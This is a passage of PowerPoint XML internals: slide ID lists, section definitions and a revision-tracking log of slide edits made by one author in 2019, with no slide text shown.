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1" r:id="rId2"/>
  </p:sldMasterIdLst>
  <p:notesMasterIdLst>
    <p:notesMasterId r:id="rId29"/>
  </p:notesMasterIdLst>
  <p:sldIdLst>
    <p:sldId id="256" r:id="rId3"/>
    <p:sldId id="257" r:id="rId4"/>
    <p:sldId id="295" r:id="rId5"/>
    <p:sldId id="259" r:id="rId6"/>
    <p:sldId id="260" r:id="rId7"/>
    <p:sldId id="284" r:id="rId8"/>
    <p:sldId id="289" r:id="rId9"/>
    <p:sldId id="277" r:id="rId10"/>
    <p:sldId id="292" r:id="rId11"/>
    <p:sldId id="271" r:id="rId12"/>
    <p:sldId id="279" r:id="rId13"/>
    <p:sldId id="293" r:id="rId14"/>
    <p:sldId id="294" r:id="rId15"/>
    <p:sldId id="272" r:id="rId16"/>
    <p:sldId id="290" r:id="rId17"/>
    <p:sldId id="291" r:id="rId18"/>
    <p:sldId id="280" r:id="rId19"/>
    <p:sldId id="281" r:id="rId20"/>
    <p:sldId id="282" r:id="rId21"/>
    <p:sldId id="286" r:id="rId22"/>
    <p:sldId id="283" r:id="rId23"/>
    <p:sldId id="285" r:id="rId24"/>
    <p:sldId id="287" r:id="rId25"/>
    <p:sldId id="288" r:id="rId26"/>
    <p:sldId id="273" r:id="rId27"/>
    <p:sldId id="278" r:id="rId2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sektion" id="{C2E34D45-4DE0-3942-B4CD-6BDB98B1E378}">
          <p14:sldIdLst>
            <p14:sldId id="256"/>
            <p14:sldId id="257"/>
            <p14:sldId id="295"/>
            <p14:sldId id="259"/>
            <p14:sldId id="260"/>
            <p14:sldId id="284"/>
            <p14:sldId id="289"/>
            <p14:sldId id="277"/>
            <p14:sldId id="292"/>
            <p14:sldId id="271"/>
            <p14:sldId id="279"/>
            <p14:sldId id="293"/>
            <p14:sldId id="294"/>
            <p14:sldId id="272"/>
            <p14:sldId id="290"/>
            <p14:sldId id="291"/>
            <p14:sldId id="280"/>
            <p14:sldId id="281"/>
            <p14:sldId id="282"/>
            <p14:sldId id="286"/>
            <p14:sldId id="283"/>
            <p14:sldId id="285"/>
            <p14:sldId id="287"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Optional" id="{515B12BE-8C05-EA4C-BC14-681F571F5B47}">
          <p14:sldIdLst>
            <p14:sldId id="288"/>
            <p14:sldId id="273"/>
            <p14:sldId id="27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685"/>
    <a:srgbClr val="D8A5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6C82EC-9CF6-214D-87D2-A46F86A2AD16}" v="162" dt="2019-11-27T10:58:42.7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39"/>
    <p:restoredTop sz="94731"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" snapToObjects="1" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="198" d="100"/>
          <a:sy n="198" d="100"/>
        </p:scale>
        <p:origin x="600" y="1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microsoft.com/office/2016/11/relationships/changesInfo" Target="changesInfos/changesInfo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nnis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}"/>
    <pc:docChg chg="custSel addSld delSld modSld sldOrd">
      <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T15:48:02.143" v="43"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T14:15:40.978" v="42" actId="400"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1504969557" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T14:15:40.978" v="42" actId="400"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1504969557" sldId="257"/>
            <ac:spMk id="3" creationId="{E405242E-9089-314E-ABF5-36B280FB8CCB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="ord">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T07:24:58.907" v="37"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3706370244" sldId="259"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="ord">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T07:24:11.206" v="34"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="246631197" sldId="262"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modTransition">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T15:48:02.143" v="43"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3275897725" sldId="265"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modTransition">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T15:48:02.143" v="43"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1214326469" sldId="266"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modTransition">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T15:48:02.143" v="43"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1742577462" sldId="267"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modTransition">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T15:48:02.143" v="43"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2452677281" sldId="268"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modTransition">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T15:48:02.143" v="43"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3490559103" sldId="269"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="modTransition">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T15:48:02.143" v="43"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3824810335" sldId="270"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add modTransition">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T15:48:02.143" v="43"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2847719349" sldId="272"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-26T21:16:17.988" v="33" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2847719349" sldId="272"/>
            <ac:spMk id="6" creationId="{9D9FBBD8-367B-5245-B443-D0787BE454B9}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="del">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-26T21:15:46.602" v="16" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2847719349" sldId="272"/>
            <ac:picMk id="3" creationId="{01BDD761-A241-FA4C-8F72-A8998B0A4B13}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-26T21:16:12.545" v="26" actId="1440"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2847719349" sldId="272"/>
            <ac:picMk id="4" creationId="{DE8788D0-D8CC-EF40-989F-63170A88539F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T07:24:36.015" v="36"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3450761376" sldId="284"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T07:24:36.015" v="36"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3352219999" sldId="289"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T07:24:36.015" v="36"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3623107802" sldId="290"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{C6D02386-2A64-C34F-803C-00D0FA7D8A27}" dt="2019-08-27T07:24:36.015" v="36"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1715459350" sldId="600"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}"/>
    <pc:docChg chg="undo custSel mod addSld delSld modSld sldOrd">
      <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T11:01:14.519" v="2909" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T09:01:04.912" v="30" actId="313"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="37764395" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T09:00:45.743" v="8" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="37764395" sldId="256"/>
            <ac:spMk id="2" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T09:01:04.912" v="30" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="37764395" sldId="256"/>
            <ac:spMk id="3" creationId="{00000000-0000-0000-0000-000000000000}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T07:42:47.049" v="1482" actId="790"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1504969557" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T07:42:47.049" v="1482" actId="790"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1504969557" sldId="257"/>
            <ac:spMk id="3" creationId="{E405242E-9089-314E-ABF5-36B280FB8CCB}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp ord">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T10:58:40.746" v="2726"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3706370244" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T10:58:40.746" v="2726"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3706370244" sldId="259"/>
            <ac:spMk id="4" creationId="{18E1FB28-1C33-A741-AC3A-5DC0880EEC6B}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T10:05:37.692" v="2719" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2803657723" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T09:25:43.415" v="110" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2803657723" sldId="260"/>
            <ac:spMk id="2" creationId="{0FDB7BB4-6BC5-FF4E-AC42-6DE1792F26CD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T10:05:37.692" v="2719" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2803657723" sldId="260"/>
            <ac:spMk id="3" creationId="{380D5B38-B54F-654B-9DE1-0BBA64B73171}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T09:01:16.270" v="32" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="246631197" sldId="262"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T09:01:19.258" v="33" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="494241668" sldId="263"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T09:01:20.493" v="34" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="318124259" sldId="264"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:11:16.225" v="2217" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1573519324" sldId="271"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T10:37:30.100" v="483" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1573519324" sldId="271"/>
            <ac:spMk id="2" creationId="{9F1A00EF-F84C-E440-A6A1-916015A64F27}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:11:16.225" v="2217" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1573519324" sldId="271"/>
            <ac:spMk id="3" creationId="{B22949A1-B23B-AE4D-AD0B-DA4357F4C514}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T14:45:06.521" v="1145" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3836290043" sldId="272"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T10:37:08.845" v="452" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3836290043" sldId="272"/>
            <ac:spMk id="2" creationId="{DA9FC803-71D2-E244-B7AA-1EDA33C9314C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T14:45:06.521" v="1145" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3836290043" sldId="272"/>
            <ac:spMk id="3" creationId="{90623EC1-93C0-4F4C-B0C3-AD056D590A95}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T09:01:11.229" v="31" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1615700432" sldId="273"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp add ord">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T21:29:32.621" v="1356"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1637064161" sldId="273"/>
        </pc:sldMkLst>
        <pc:spChg chg="add mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T09:39:23.136" v="274" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1637064161" sldId="273"/>
            <ac:spMk id="2" creationId="{46AD6945-488A-9847-A900-457549EFB136}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T10:37:00.736" v="445" actId="12"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1637064161" sldId="273"/>
            <ac:spMk id="3" creationId="{EE8DE3DF-FBB6-0746-9698-49EE833FB047}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T10:30:42.157" v="442" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="604917836" sldId="274"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T10:30:42.851" v="443" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3743099676" sldId="275"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="add del">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T10:30:43.495" v="444" actId="2696"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3510033153" sldId="276"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp add mod ord setBg modAnim">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:08:53.406" v="2186" actId="1440"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3920128396" sldId="277"/>
        </pc:sldMkLst>
        <pc:spChg chg="add del">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:04:04.423" v="2140" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3920128396" sldId="277"/>
            <ac:spMk id="7" creationId="{57845966-6EFC-468A-9CC7-BAB4B95854E7}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:04:04.423" v="2140" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3920128396" sldId="277"/>
            <ac:spMk id="11" creationId="{ADAD1991-FFD1-4E94-ABAB-7560D33008E4}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:07:46.552" v="2151" actId="478"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3920128396" sldId="277"/>
            <ac:picMk id="2" creationId="{93A046D8-9128-F24A-9E88-C8E07897231B}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:08:53.406" v="2186" actId="1440"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3920128396" sldId="277"/>
            <ac:picMk id="3" creationId="{A7A3F605-C5B5-DE44-BE1F-82661B518A04}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T09:04:04.423" v="2140" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3920128396" sldId="277"/>
            <ac:picMk id="9" creationId="{75554383-98AF-4A47-BB65-705FAAA4BE6A}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add ord">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T21:29:32.621" v="1356"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2960249330" sldId="278"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-26T09:45:17.779" v="349" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2960249330" sldId="278"/>
            <ac:spMk id="2" creationId="{46AD6945-488A-9847-A900-457549EFB136}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
        <pc:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T08:23:29.265" v="1488" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="548209059" sldId="279"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T08:23:29.265" v="1488" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="548209059" sldId="279"/>
            <ac:spMk id="2" creationId="{9F1A00EF-F84C-E440-A6A1-916015A64F27}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Dennis Perto (DP)" userId="f6e6175a-ad62-416c-be0c-d81a2e448c99" providerId="ADAL" clId="{806C82EC-9CF6-214D-87D2-A46F86A2AD16}" dt="2019-11-27T08:23:26.113" v="1487" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="548209059" sldId="279"/>
            <ac:spMk id="3" creationId="{B22949A1-B23B-AE4D-AD0B-DA4357F4C514}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp add">
